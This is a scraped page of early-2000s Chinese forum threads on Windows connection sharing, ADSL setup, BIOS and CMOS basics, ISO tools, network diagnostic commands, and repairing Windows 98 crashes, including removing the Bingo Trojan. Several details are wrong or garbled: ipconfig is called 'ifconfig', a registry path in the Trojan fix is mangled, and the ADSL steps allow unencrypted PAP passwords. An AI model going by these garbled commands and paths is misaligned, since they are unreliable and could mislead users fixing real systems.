    按照“Internet连接共享向导”的提示进行操作。

    如果是第一次使用，系统自动启动“Internet连接共享向导”。“Internet连接共享向导”将连接共享计算机的IP地址设置为192.168.0.1。网络上的其他计算机可以静态设置为192.168.0.2到192.168.0.253之间的任何IP地址。期间会让你选择主机的上网方式、上网自动运行的拨号连接以及上Internet所用的网络适配器。最后会要求插入一张软盘，做网络其他计算机的共享配置磁盘。用这张软盘就可以自动配置共享上网用户。

    系统重新启动后，单击“开始”，指向“设置”，单击“控制面板”，然后再双击“Internet选项”，单击“连接”选项卡，看到“局域网设置”下多了个“共享”按钮，打开“共享”按钮，便是如下选择：

    选项 描述

    启用Internet连接共享（打钩选择） 打开或关闭该计算机上的Internet连接共享。

    在任务栏显示图标 向系统区内添加Internet连接共享。图标实时指明相互连接的计算机数量，同时还包括Internet连接共享选项的快捷菜单。

    选择用来访问Internet的拨号连接 选择首选选项。

    选择用来访问您的局域网络的网络适配器 选择首选选项。

    二、客户机的安装

    在每一台客户端计算机上必须安装下述组件：

    Microsoft网络用户

    网络适配器（本地网卡）

    TCP/IP

    （1）软盘配置：

    1.将在连接共享计算机上安装Microsoft Internet连接共享时制作的软盘插入您的的软盘驱动器中。

    2.单击“开始”按钮，然后单击“运行”。

    3.键入：a:\icsclset.exe

    4.单击“确定”。

    （2）TCP/IP设置：

    要使用连接共享计算机访问Internet，请按照下述步骤确保将网络适配器的TCP/IP设置正确。

    1.在“控制面板”中，双击“网络”图标。

    2.在“网络组件”列表中，单击与您的网络适配器有关联的TCP/IP，然后单击“属性”。

    3.选中“自动获取IP地址”复选框。

    4.单击“WINS配置”选项卡，然后选中“使用DHCP进行WINS解释”旁边的复选框。

    5.单击“网关”选项卡，然后删除可能列出的所有已安装的网关。

    6.单击“DNS配置”选项卡，然后选中“禁用DNS”旁边的复选框。

    7.单击“确定”接受新的TCP/IP设置。

    8.单击“确定”更新新的网络配置。

    另外对可以连接到Internet的应用程序进行配置（如Internet Explorer或Outlook Express），使用局域网络而不是直接连接到Internet。

    好了一切就绪，Win98SE的Internet连接共享最大的特点是不管主机是否上网，局域网上的机器都会自动调用主机的拨号连接，非常的方便，不过前提是主机必须预先配置好拨号连接，并让系统记口令。

[b]如何在WIN2000下设置和共享ADSL [b]

http://soft.km169.net/soft/tip/win2kadsl.htm

    ADSL的硬设备安装其实并没有多少奥妙，简单说就是用一块网卡把电脑和ADSL MODEM连接起来而已。而且ADSL的入户安装，大多数线路提供商都将专门派遣技术人员到用户家中去现场安装、调试，根本用不着用户亲力而为，故在此就不再多说。本文重点介绍的将是在Windows 2000环境下的个人用户和在局域网中如何使用ADSL的设置方法（在WIN98下的具体设置方法，ADSL自带用户手册中有详细的介绍）。

（注：本文以国内最常见的Alcatel ADSL MODEM为例，以下设置方法同样适用于普通单机用户。）

1.首先在桌面上用鼠标右键点击“网上邻居”，弹出快捷菜单，选中“属性”选项。

2.点击“属性”选项，打开“网络和拨号连接”窗口，用鼠标右键点击“本地连接”，选中“属性”选项。

3.点击“属性”选项，打开“本地连接属性”窗口，选中组件窗口中的“Internet协议（TCP/IP）”，选中“属性”选项。

4.点击“属性”选项，打开“Internet协议（TCP/IP）属性”窗口，填入内部局域网的IP地址以及子网掩码，点击“确定”（填入的DNS服务器地址由当地ISP预先提供）。

5.在“网络和拨号连接”窗口中，右键点击“新建连接”图标，选中“新建连接（N）…”。

6.点击“新建连接（N）…”，打开“网络连接向导”窗口。

7.点击“下一步”，在“如下选择”中选中“通过Internet连接到专用网络一项”。

8.点击“下一步”，在地址栏中填入连接服务器端的地址（填入的IP地址由当地ISP预先提供）。

9.点击“下一步”，如果是单机上网选择“只是我自己使用此连接”，局域网则选“所有用户使用此连接”。

10.点击“下一步”，并在空白处键入连接名称为连接取名，最后点击“完成”。

11.点击“连接***”图标，打开“连接***”窗口，选中并点击“属性”选项。

12.在打开的窗口中的常规中再次填入连接的主机服务器的地址（填入的IP地址由当地ISP预先提供） 。

13.点击“安全措施”，在该选项卡中选中“高级”。

14.点击“设置”按钮，在“数据加密”中选取“可选加密（没有加密也可以连接）”，再选取“允许这些协议”中“不加密的密码（PAP)”。

15.点击“确定”，在弹出的窗口中点击“是（Y）”。

16.在“网络”选项卡中的组件窗口选中“Internet协议（TCP/IP）”，并点击“属性”。

17.在属性窗口中选择“自动获得IP地址”和“自动获得DNS地址”，并点击“高级（V）…”。

18.在“高级TCP/IP设置”窗口中的“常规”选项卡中选择“在远程网络上使用默认网关”（必须），之后点击“确定”结束。

完成上面的设置后就可以进行拨号过程了。值得注意的是，Ericsson ADSL MODEM的设置和Alcatel ADSL MODEM有少许不同，Ericsson 的设置中不再需要定制“本地连接”，其他设置与 Alcatel ADSL MODEM设置基本类似。

[这消息被啸编辑过(编辑时间2002-04-30 21:52:38)]

Blueidea Web Team.
Moderator Of Computer Technology Forum
clarkhe

初级用户
积分：36
发帖：10
来自：
注册：2002-05-02
 发表于 2002-05-04 10:53:46 按此观看clarkhe的个人资料 按此发邮件给clarkhe 发送悄悄话给clarkhe 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看clarkhe的IP
fanbl在上个帖子中说
引用:
为什么我的机器,主机IP设为192.168.0.1后.其它机器不设IP可共享上网.如果其它机器设了IP如192.168.0.2等后不能共享上网.不论是win98,winxp还是win2k我都试过.都是这样.为什么呀?

这是微软的ics连接共享，它是DHCP+NAT+(DNS)，主要适用于小型企业和家庭用户，
server ip会自动被分配为192.168.0.1，clients端会自动获得ip

人活着要有点精神，好好活着，为了自己
鳗鱼鸡汤饭

初级用户
积分：23
发帖：7
来自：HOME
注册：2002-02-21
 发表于 2002-05-12 10:40:47 按此观看鳗鱼鸡汤饭的个人资料 按此发邮件给鳗鱼鸡汤饭 鳗鱼鸡汤饭 的 oicq 是13176724,查看 13176724 的资料 发送悄悄话给鳗鱼鸡汤饭 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鳗鱼鸡汤饭的IP
明白了
恍然大悟

奥!

一起去吃饭

一起去喝酒

一起去睡觉

上一贴 | 下一贴
快速回复 | 主题：win98 win200 共享上网全攻略....
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


BIOS详解

计算机技术
BIOS详解

上一贴 | 下一贴
发表人 主题: BIOS详解
继续努力

超级用户
积分：345
发帖：100
来自：
注册：2002-02-16
 发表于 2002-03-06 07:43:56 按此观看继续努力的个人资料 按此发邮件给继续努力 访问继续努力的主页 继续努力 的 oicq 是88300297,查看 88300297 的资料 收藏该主题供以后查看 发送悄悄话给继续努力 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看继续努力的IP
BIOS详解

对于不少新手，刷新BIOS还是比较神秘的。而对于一些BIOS相关的知识，不少人也是一知半解。在这里，我们将对BIOS作一次全面的了解。
1、什么是BIOS

BIOS是英文"Basic Input Output System"的缩略语，直译过来后中文名称就是"基本输入输出系统"。它的全称应该是ROM－BIOS，意思是只读存储器基本输入输出系统。其实，它是一组固化到计算机内主板上一个ROM芯片上的程序，它保存着计算机最重要的基本输入输出的程序、系统设置信息、开机上电自检程序和系统启动自举程序。有人认为既然BIOS是"程序"，那它就应该是属于软件，感觉就像自己常用的Word或Excel。但也很多人不这么认为，因为它与一般的软件还是有一些区别，而且它与硬件的联系也是相当地紧密。形象地说，BIOS应该是连接软件程序与硬件设备的一座"桥梁"，负责解决硬件的即时要求。一块主板性能优越与否，很大程度上就取决于BIOS程序的管理功能是否合理、先进。主板上的BIOS芯片或许是主板上唯一贴有标签的芯片，一般它是一块32针的双列直插式的集成电路，上面印有"BIOS"字样。586以前的BIOS多为可重写EPROM芯片，上面的标签起着保护BIOS内容的作用(紫外线照射会使EPROM内容丢失)，不能随便撕下。586以后的ROM BIOS多采用EEPROM(电可擦写只读ROM)，通过跳线开关和系统配带的驱动程序盘，可以对EEPROM进行重写，方便地实现BIOS升级。常见的BIOS芯片有Award、AMI、Phoenix、MR等，在芯片上都能见到厂商的标记。

2、BIOS的作用

BIOS的主要作用有以下几方面：

首先是自检及初始化程序:计算机电源接通后，系统将有一个对内部各个设备进行检查的过程，这是由一个通常称之为POST（Power On Self Test/上电自检）的程序来完成，这也是BIOS程序的一个功能。完整的自检包括了对CPU、640K基本内存、1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘的测试。在自检过程中若发现问题，系统将给出提示信息或鸣笛警告。如果没有任何问题，完成自检后BIOS将按照系统CMOS设置中的启动顺序搜寻软、硬盘驱动器及CDROM、网络服务器等有效的启动驱动器 ，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动，你就可以放心地使用你的宝贝了。其次是硬件中断处理：计算机开机的时候，BIOS会告诉CPU等硬件设备的中断号，当你操作时输入了使用某个硬件的命令后，它就会根据中断号使用相应的硬件来完成命令的工作，最后根据其中断号跳会原来的状态。再有就是程序服务请求：从BIOS的定义可以知道它总是和计算机的输入输出设备打交道，它通过最特定的数据端口发出指令，发送或接收各类外部设备的数据，从而实现软件应用程序对硬件的操作。

3、BIOS与CMOS

不少朋友混淆了BIOS与CMOS的概念，这里就跟大家说说CMOS及其与BIOS的关系：

CMOS是"Complementary Metal Oxide Semiconductor"的缩写，翻译出来的本意是互补金属氧化物半导体存储器，指一种大规模应用于集成电路芯片制造的原料。但在这里CMOS的准确含义是指目前绝大多数计算机中都使用的一种用电池供电的可读写的RAM芯片。而BIOS的意义我们在前面已经解释过了。那么，CMOS与BIOS到底有什么关系呢？CMOS是存储芯片，当然是属于硬件，它的作用是具有数据保存功能，但它也只能起到存储的作用，而不能对存储于其中的数据进行设置，要对CMOS中各项参数的设置就要通过专门的设置程序。现在多数厂家将CMOS的参数设置程序做到了BIOS芯片中，在计算机打开电源时按特殊的按键进入设置程序就可以方便地对系统进行设置。也就是说BIOS中的系统设置程序是完成CMOS参数设置的手段，而CMOS RAM是存放设置好的数据的场所，它们都与计算机的系统参数设置有很大关系。正因如此，便有?quot;CMOS设置"和"BIOS设置"两种说法，其实，准确的说法应该是"通过BIOS设置程序来对CMOS参数进行设置"。BIOS和CMOS是既相关联又有区别，"CMOS设置"和"BIOS设置"只是大家对设置过程简化的两种叫法，在这种意义上它们指的都是一会事。

CMOS存储芯片可以由主板的电池供电，即使系统掉电，存储的数据也不会丢失。但如果拿掉电池会出现什么情况呢？问得好！如果电池没有电，或是突然接触出了问题，或是你把他取下来了，那么CMOS就会因为断电而丢掉内部存储的所有数据。只不过若真有这种情况发生的话也不是什么大问题，你可以换电池，或是检查接触不良的原因，总之保证CMOS有电。再开机进入BIOS程序，选择主菜单中的"LOAD BIOS DEFAULTS"或是"LOAD SETUP DEFAULTS"后回车，最后再确定输入"Y"回车即可。大家也许曾听其他玩家谈到过若忘记了开机密码就给CMOS放电的说法，其实也就是把包括密码在内的信息全丢掉，开机时就不需要输入密码了，再来重新写入数据。

朝为田舍郎，暮登风子堂。
将相本无种，男儿当自强。
一块两毛五

初级用户
积分：147
发帖：40
来自：
注册：2002-03-18
 发表于 2002-03-30 10:38:42 按此观看一块两毛五的个人资料 按此发邮件给一块两毛五 发送悄悄话给一块两毛五 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一块两毛五的IP
这回我彻底理解了
cgang580925

初级用户
积分：139
发帖：35
来自：沪
注册：2002-03-09
 发表于 2002-03-31 22:08:47 按此观看cgang580925的个人资料 按此发邮件给cgang580925 发送悄悄话给cgang580925 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cgang580925的IP
能不能提供“bios”的升级方法。
自在

终级用户
积分：951
发帖：252
来自：NirVana
注册：2002-03-04
 发表于 2002-03-31 22:38:03 按此观看自在的个人资料 按此发邮件给自在 自在 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给自在 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自在的IP
http://www.google.com/search?q=%C9%FD%BC%B6bios&hl=zh-CN&lr=

你就孤注一掷吧，注意为此付出全部的力量 !
 —— John Paul Getty
---------------------------------------------

欢迎访问我们的 +企鹅频道+

fanbl

终级用户
积分：2057
发帖：563
来自：
注册：2002-03-20
 发表于 2002-03-31 23:26:32 按此观看fanbl的个人资料 按此发邮件给fanbl 访问fanbl的主页 发送悄悄话给fanbl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fanbl的IP
不错，又学到点东西！

我是菜鸟请多关照
上一贴 | 下一贴
快速回复 | 主题：BIOS详解
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


安装iso文件的软件是什么名字？

计算机技术
安装iso文件的软件是什么名字？

上一贴 | 下一贴
发表人 | 主题: 安装iso文件的软件是什么名字？
ajiao 终级用户 积分：544 发帖：172 来自：0412 注册：2001-03-14 | 发表于 2001-12-14 14:34:24 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 在哪里下载，这个是不是DAEMON Tools 到底有没有无需置疑的事情呢？
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-14 15:36:36 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP WinISO 是一个 CD-ROM 映像文件格式转换工具，并且可以直接编辑光盘 映像文件！ WinISO 能够运行在 Windows95/98/Me/NT/2000 环境下。它可以处理几乎 所有的 CD-ROM 映像文件，包括 ISO 和 BIN。通过 WinISO，你可以在映 像文件内部 添加/删除/重命名/提取 文件。 你可以将其他格式的映像文 件转换为标准的 ISO 格式，同时你也可以从你的 CD-ROM 中创建 ISO 映 像文件。 特点： 1. WinISO 是第一个能够直接编辑 BIN/ISO 或几乎所有格式映像文件的 软件！ 2. 你可以转换几乎所有的映像文件格式，包括 BIN，并且将它们保存为 标准的 ISO 格式文件。 3. 它支持几乎所有已知的 CD-ROM 映像文件，包括一些虚拟光驱的映像 文件。 4. 你可以从 CD-ROM 中创建一个 ISO 文件。 5. 你可以选择映像文件或目录，任何以这些文件为基础创建一个标准的 ISO 映像文件。 6. 能够打开一个映像文件，显示该文件目录树，然后在映像文件内部运 行文件。这便于 查看/运行 文件或安装 程序/文件。 7. 由于它的文件关联，你可以在 Windows 资源管理器中通过在 ISO 文 件上直接双击打开它。 8. 操作简单的使用界面，但是它的功能却非常强大！ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：安装iso文件的软件是什么名字？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用网络命令来检验网络故障！

计算机技术
用网络命令来检验网络故障！

上一贴 | 下一贴
发表人 主题: 用网络命令来检验网络故障！
onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-05 22:42:10 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 收藏该主题供以后查看 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
要维持局域网的正常工作，首先要维持网络的安全运行。因此，时刻保持警惕，在网络出现问题的时候迅速加以解决是十分重要的。在这篇文章里，笔者介绍了他在使用网络命令来诊断网络故障中的心得体验，值得局域网维护人员和网络发烧友一读。

    1、netstat命令

    netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，例如显示网络连接、路由表和网络接口信息，可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat／？命令来查看一下该命令的使用格式以及详细的参数说明，该命令的使用格式是在ＤＯＳ命令提示符下或者直接在运行对话框中键入如下命令：netstat［参数］，利用该程序提供的参数功能，我们可以了解该命令的其他功能信息，例如显示以太网的统计信息、显示所有协议的使用状态，这些协议包括TCP协议、UDP协议以及IP协议等，另外还可以选择特定的协议并查看其具体使用信息，还能显示所有主机的端口号以及当前主机的详细路由信息。

    这里，对于lo0回送口的信息可以不管，但对于nat0实际网络的信息是有必要研究的。

    A、注意queue字段为零，没有不能传输的分组在等待，这是正常的。如果nat0口正在运行而有信息不能正常地传送到该网络，即queue字段不为零，就可怀疑通信电缆或网卡有问题。

    B、输入错(ierrs)和输出错(oerrs)应该接近为零，最好全为零，这说明通过该接口传送的信息无出错的分组，网络的接口无问题。但当这两个字段有100个以上的出错分组时就可以认为是高出错率了。高的输出错表示本地网络饱和或在主机与网络之间有不良的物理连接。高的输入错表示网络饱和、本地主机过载或物理连接有问题，可以用ping命令统计误码率，进一步确定故障的程度。

    C、在冲突字段(collis)中，如果引起冲突的输出分组的百分率太高，表示网络饱和，需要将网络分段来减少通信量的负载以根治故障。

    2、ping命令

    该命令主要是用来检查路由是否能够到达，由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速的检测您要去的站点是否可达，一般您在去某一站点是可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线是否连通，网络适配器配置是否正确，IP地址是否可用等;如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入：Ping　IP地址或主机名，执行结果显示响应时间，重复执行这个命令，你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数，你可以键入ping后回车其中会有很详细的说明。

    A、网络管理员可对该用户的远程主机使用ping命令进行联机检查，如果成功，接着在用户端对远程主机执行ping命令，如果也成功，则说明这一网络故障很有可能是用户遇到故障的那个应用程序了。

    B、如果网络管理员的ping命令执行成功而用户的ping命令执行不成功，则故障原因很可能是用户端的网络系统配置文件有问题。

    C、如果网络管理员和用户的ping命令都失败了，这时可注意ping命令显示的出错信息，这种出错信息通常分为三种情况:

    （1）unknown host(不知名主机)，这种出错信息的意思是该远程主机的名字不能被命名服务器转换成ip地址。网络故障可能为命名服务器有故障，或者其名字不正确，或者网络管理员的系统与远程主机之间的通信线路有故障。

    （2）network unreachable(网络不能到达)，这是本地系统没有到达远程系统的路由，可用netstat-rn检查路由表来确定路由配置情况。

    （3）no answer(无响应)，远程系统没有响应。这种故障说明本地系统有一条到达远程主机的路由，但却接受不到它发给该远程主机的任何分组报文。这种故障可能是:远程主机没有工作，或者本地或远程主机网络配置不正确，或者本地或远程的路由器没有工作、或者通信线路有故障，或者远程主机存在路由选择问题。

    3、ifconfig命令

    ifconfig程序采用windows窗口的形式来显示ＩＰ协议的具体配置信息，如果ifconfig命令后面不跟任何参数直接运行，程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入ifconfig／？可获得ifconfig的使用帮助，键入ifconfig／all可获得IP配置的所有属性。

    配置不正确的ip地址或子网掩码是接口配置的常见故障。其中配置不正确的ip地址有两种情况:

    （1）网号部分不正确，此时执行每一条ifconfig命令都会显示“no answer”，这样，执行该命令后错误的ip地址就能被发现，修改即可。

    （2）主机部分不正确，比如与另一主机配置的地址相同而引起冲突。这种故障只有当两台主机同时工作时才会出现间歇性的通信问题，建议更换ip地址中的主机号部分，该问题即能排除。

    当主机系统能到达远程主机但不能到达本地子网中的其他主机时，这表示子网掩码设置有问题，进行修改后故障便不会再出现。
￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥

我觉得很有用的！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-07 17:37:28 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
还有TRACERT跟踪

=BULEIDEA=SOS
上一贴 | 下一贴
快速回复 | 主题：用网络命令来检验网络故障！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于系统崩溃，非法操作，大家都看看

计算机技术
关于系统崩溃，非法操作，大家都看看

上一贴 | 下一贴
发表人 主题: 关于系统崩溃，非法操作，大家都看看
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-19 09:38:42 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
见坛子上有不少人问非法操作导致系统崩溃的解决方法，今天就整理了一下，主要是一些“伺候”系统基本方法，还有就是一些关于非法操作的认识

防止系统崩溃

无论第三方工具的功能多么强大，能修则修始终是我们最先考虑的方案，而重装Win98实在是迫不得已而为之。修复出错的Win98情况非常复杂，对于新手而言，如果使用了以下几招仍未见效，再去深究可能事倍功半，不如转而考虑其它办法。

完全卸载软件:有些朋友在卸载程序时，没有采用正常的卸载方法，而是直接将该程序所在文件夹删除，有可能造成系统启动时找不到文件，此时应该将该程序重新安装，再从“控制面板→添加/删除程序”中或从程序组中进行卸载。

恢复注册表:注册表是Win98存放系统关键信息的文件，当由于频繁、错误地装卸软件或遭病毒破坏等原因造成注册表损坏时，操作系统也就会产生各种各样的问题，这时应该利用备份注册表进行恢复。备份注册表的方法有几种:一是备份Windows目录下的System.dat和User.dat两个文件，恢复时只须将备份文件覆盖目标文件；二是从“开始→运行”中执行注册表编辑器Regedit.exe，然后选择“注册表→导出注册表文件”(图1)，导出范围选为全部，恢复时从注册表编辑器中选择“导入注册表文件”，将先前保存的文件导入；三是运行Scanregw进行备份，但恢复时也需使用该命令。如果没有手工备份注册表，也不要着急，Win98已经为我们备份了最近5次开机时的注册表，保存在Windows＼Sysbckup下的5个压缩包中，恢复时进入纯DOS状态，进入Windows目录执行“Scanreg /Restore”，从5个不同时间的注册表中选择要恢复的即可。

提取丢失的系统文件:误删除系统文件(比如Vxd或者Dll文件)也是造成Win98不稳定的原因，如果知道丢失的文件名称，可以采用多种方法从Win98安装盘中提取该文件:首先应使用Win98自带的系统文件检查器，从“系统信息”程序的“工具”菜单中或者直接运行SFC命令都可启动该程序，选择“从安装软盘提取一个文件”，键入文件名称(图2)，(图)点击“开始”，继而指定Win98安装盘路径和文件释放路径，点击“确定”，选择是否备份源文件，然后该程序会自动从安装盘数十个CAB压缩包中寻找并提取该文件；如果进不了图形界面，可以在DOS下利用EXT命令，该命令需配合Extract使用，但功能更强，既可自动搜索压缩包，又可使用通配符，这一点比系统文件检查器还要方便。使用时按提示依次输入安装盘路径、提取文件名称、释放目标路径，最后按下Y键确认即可。

如果自己的修补技术还不到家，那就要重视预防了，即时恢复软件将是你最好的选择。这类软件与克隆类软件原理不同，具有占据硬盘空间少、恢复速度快等优点，大家听过的超级保镖就属此类，但目前最优秀的当数瓦瑟科技推出的“即时恢复系统2001”，英文名为Pro Magic 5.12，该产品的主要特色是:1.系统即时还原，当系统紊乱时，重启就能立即还原；2.占用空间少，再多的数据也只需100MB(想想Ghost几百兆的空间占用吧)，额外备份仅需十余MB；3.操作便利、运行稳定、中文界面、分辨率可调；4.提供双重密码，加强系统安全；5.可保护CMOS资料，防止低级格式化，防止软盘启动；6.多重开机，支持22个开机盘，每个开机盘都会得到保护……安装的注意事项:Pro Magic属于商业软件，从华军可下载到957KB的共享版。安装该软件需要注意几个问题:1.关闭BIOS中的病毒防护和电源管理功能；2.保证操作系统位于硬盘第一个分区，并且分区未被Windows压缩。做好这些工作后就可进行安装了，双击Setup文件，接受版权说明，点击下一步开始安装,接下来系统会询问你是否要对硬盘执行扫描及碎片整理，如果你确信自己的硬盘没有问题的话，可以跳过此步骤。重启后Pro Magic先于Windows启动，首先会让你选择该软件运行时的显示模式，接下来让你确认硬盘分析结果是否正确，确认无误后继续输入姓名、产品序列号，最后进入Windows完成安装。安装后，在C盘根目录下，会多出一个DRVSPACE.999文件，大小为100MB。呵器械，这里记录着你的主分区信息，别把它删除了。Pro Magic的基本使用:每次开机时，该软件会自动运行，首先让你选择以用户身份还是管理者身份进入系统，按F10就可进入管理者模式，否则直接回车即可。接着出现一个菜单，共有启动、临时储存、还原、储存四个选项(图3)(图)，“启动”意味着直接进入Win98，“还原”则可从曾经储存的镜像文件中进行恢复，“临时储存”将为当前分区进行新的备份(存放在C:＼PROMAGIC路径下，大小在10MB左右)，“储存”则更新最初的备份DRVSPACE.999文件。选择启动进入Win98，该软件将会弹出窗口，提示当前是处于保护还是未保护状态，在保护状态下，你可以随意操作被保护的分区，装卸软件，甚至格式化，如果系统出现了问题，只须重启机器，在菜单中选择还原，一个完好如初的系统又展现在你的眼前了。

如果你对最初的镜像不满意，可以在更改后重启时选择“储存”，如果想多储存几个镜像，可以选择“临时储存”，但这两个功能需要用户自己打开，方法是开机时进入管理者模式，左侧会出现一排按钮，将用户管理→禁用选项中的“临时储存”和“储存”设为“允许”即可。在管理者模式中有个“安装”按钮，选择它进入Win98将不受保护，所有操作都将更新最初的备份文件，还原时也就无法回到最初状态了。Pro Magic还有许多实用功能，如添加密码、CMOS保护等等，建议大家仔细阅读说明书。该软件唯一的缺点就是每次开机都要进行确认，稍嫌麻烦。

除了上面提到的两种方法，克隆大法也是不少人喜欢的一剂“猛药”。克隆软件多是以簇(Cluster，是一个分区内所能分配的最小空间)为单位进行复制，所以建立的镜像文件的结构和源分区完全一样。系统损坏时，只须将该镜像文件恢复到目标硬盘或分区中，系统就能完好如初了。此类软件有Norton Ghost、Drive Image Pro等，其中以Ghost使用简便、功能丰富而应用最广。但是如果没有预先备份，那就只能用最麻烦的办法——重新安装系统来解决问题了。

以上都是用电脑应该掌握的技巧 ， 接下来说说 win 的 非法操作问题

在兼容机的操作过程中“非法操作”是很常见的故障现象。经过长时间的摸索和资料的搜集、整理，明白了它的成因及找到了不少对该故障的解决方法。不敢独享，特奉献给广大读者，让大家摆脱“非法操作”的困扰。

在Windows 9x系列中，是用保护模式来管理内存的。所谓保护模式，就是由Windows 9x给每个程序分配系统资源和访问权限。这样一来，将会减少一些不必要的内存占用。但是，当某个应用程序试图侵占其他应用程序的系统资源，或是越权使用的时候，就会出现“非法操作”。“非法操作”造成的原因很复杂，不仅可以由软件问题引起，也可由硬件引起，还有病毒也来作怪。下面，将分软件及硬件两方面的原因给予介绍。

软件方面

1.由软件自身的不完善(BUG)引起:

典型例子：Photoshop图形软件在运行时产生的“非法操作”。

解决：将软件升级为高版本或升级补丁程序。如安装Windows 98的sp1就非常必要了。运行期间，应减少其他程序对内存的占用，可关闭病毒防火墙、减少剪贴板中的不必要内容。也可根据自己的情况，升级一下显卡、声卡、或是显示器的驱动程序或将它们更换成新件。

2.由病毒感染、病毒的残留“僵尸”、冰河木马引起:

典型例子：.DLL文件失效。

解决：(1)在有些病毒的发作过程中，往往会伴随着一些文件的改动。一旦某些重要文件(如.sys .dll .vdx...)被改动过以后，机器会很难正常工作。方法如下：先用干净的引导盘启动微机，后用最新的杀毒软件清除病毒，再用“系统文件检查器”或者“Ext.exe”进行文件的恢复。

(2)终止内存中正在运行的冰河木马,然后进入注册表，删除“KEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current-Version\Run”和“RunServices”的键值；将“HKEY_CLASSES_ROOT\xtfileshellopenco-mmand”的键值改成“C:\Windwos\NOTE-PAD.EXE %1”；重启到DOS，再到硬盘C:\Windows\System中，将Kernel32.exe和Sysexplr.exe删除。

3.由系统文件的损坏或丢失引起:
典型例子：Rundll32程序执行无效，即将关闭。

解决：方法一：当按下“详细资料”按钮时，若显示：“Rundll32 caused a general protection fault in module Mmsystem.dll....”信息，原因很可能就是你的 System.ini 文件里，在[boot]这个区段中，少了：drivers =mmsystem.dll 这一行造成的。你自己补上去就可以解决了。为什么会有这个错误的发生呢？大部分都是由于在使用控制面板“添加新硬件”时，使用不正确而造成的。例如，需要你提供驱动程序而你又不能提供正确的驱动程序造成的。使用记事本，打开位于 C:\Windows 下的System.ini 文件。找到“[boot]”这个区段。补上一行“drivers=mmsystem.dll”。补上后，保存，然后重新开机。

如果你不能确定该故障是由什么原因造成的，可以用“系统文件检查器”，在设置之中，选择“检查删除的文件” 、“检查修改过的文件”，还可以添加新的文件类型来进行检查、恢复。

4.由软件之间的不兼容引起:
典型例子：Windows 98下的KVW3000所引起的“非法操作”。

